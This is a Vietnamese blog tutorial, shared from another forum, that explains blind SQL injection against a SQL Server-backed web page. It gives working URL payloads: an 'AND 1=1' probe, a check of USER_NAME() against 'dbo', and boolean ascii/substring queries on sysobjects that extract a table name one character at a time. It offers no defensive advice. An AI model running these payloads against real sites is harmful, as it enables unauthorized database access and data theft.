Chia sẽ kiến thức về Nhiếp ảnh & Truyền Thông

[Hacking] Blind sql injection

by Thao LEE
blind sql

Nói qua 1 chút , nếu khai thác theo lỗi SQL injection thông thường ta khai thác qua các error message gửi về từ server .Tuy nhiên 1 số admin đã ngăn việc hiển thị các error message nhưng thật đáng tiếc như thế là ko đủ
Nếu như bạn ko nhận được các error message thì đừng lo vì rất có thể chúng ta vẫn khai thác thông tin được qua “blind” sql injection .
Phát hiện lỗi “blind sql injection”:

1 URL như sau : http://www.company.com/pressRelease.jsp?pressID=5

và câu lệnh SQL được thực hiện sẽ là :

SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5

để xác định xem nó có bị dinh lỗi blind sql injection ko ta hãy thử thêm vào 1 điều kiện đúng .Ví dụ như:

http://www.company.com/pressRelease.jsp?pressID=5 AND 1=1

và nếu database server thực hiện lệnh

SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5 AND 1=1

và nếu ta vẫn được trả về vị trí của http://www.company.com/pressRelease.jsp?pressID=5 thì có nghĩa là nó đã dính lỗi rồi đấy .

Khai thác:

Bây giờ chúng ta sẽ đoán các thông tin của database bằng việc thực hiên các câu hỏi đúng sai với server

Ví dụ : ta sẽ hỏi server xem ” có phải user hiện tại là dbo ko?” bằng cách :

http://www.company.com/pressRelease.jsp?pressID=5 AND USER_NAME()=’dbo’

( USER_NAME() là 1 hàm của SQL Server trả về tên của user hiện tại )

Nếu user hiện tai đúng là ‘dbo’ thì chúng ta sẽ được trả về http://www.company.com/pressRelease.jsp?pressID=5 còn nếu ko thì sẽ ko có trang nào được trả về cả.

Hay phải ko các bạn

Bằng cách so sanh các câu hỏi nhỏ với các hàm ta có thể hỏi nhiều câu phức tạp hơn . Sau đây là ví dụ về cách lấy tên của 1 table ( từng chữ 1 )

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’), 1,1)))>109

Lệnh SELECT sẽ yêu cầu tên của table đầu tiên trong database

Hàm substring() sẽ trả về chữ đầu tiên trong kết quả của câu lện

Hàm lower() đơn giản chỉ là chuyển kí tự thành kiêu chữ thường, ko viết hoa.

Hàm ascii() sẽ trả về giá trị ASCII của kí tự đó

Nếu server ko báo lỗi gì thì chúng ta có thể biết rằng tên đầu tiên của table là một chữ sau chữ “m” ( vì trong bảng mã giá trị của chữ “m” là 109 )

tiếp theo :

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’), 1,1)))>116

Nếu báo lỗi tức là ta biết được giá trị ASCII của kí tự đầu tiên này nằm trong khoảng từ chữ “n” đến chữ “t” ( giá trị của t là 116)

Cứ thế thu hẹp dần ta sẽ được giá trị của kí tự đầu tiên sẽ nằm trong khoảng “n” và “o” ( 110 và 111)

Tiếp theo:

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’), 1,1)))=111

Server ko báo lỗi mà trở về trang http://www.company.com/pressRelease.jsp?pressID=5 <–vậy là ta biết được kí tự đầu tiên của table là “o”

Đoán tiếp kí tự thứ 2 ta làm như sau :

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’), 2,1)))>109

(chú ý ta phải đổi đối số từ 1 sang 2 )

và rồi làm lại như thế , dần dân ta sẽ nhân được tên đầy đủ của table ( trong ví dụ này là “orders”)

Trích từ idol VNW

You may also like

Leave a Comment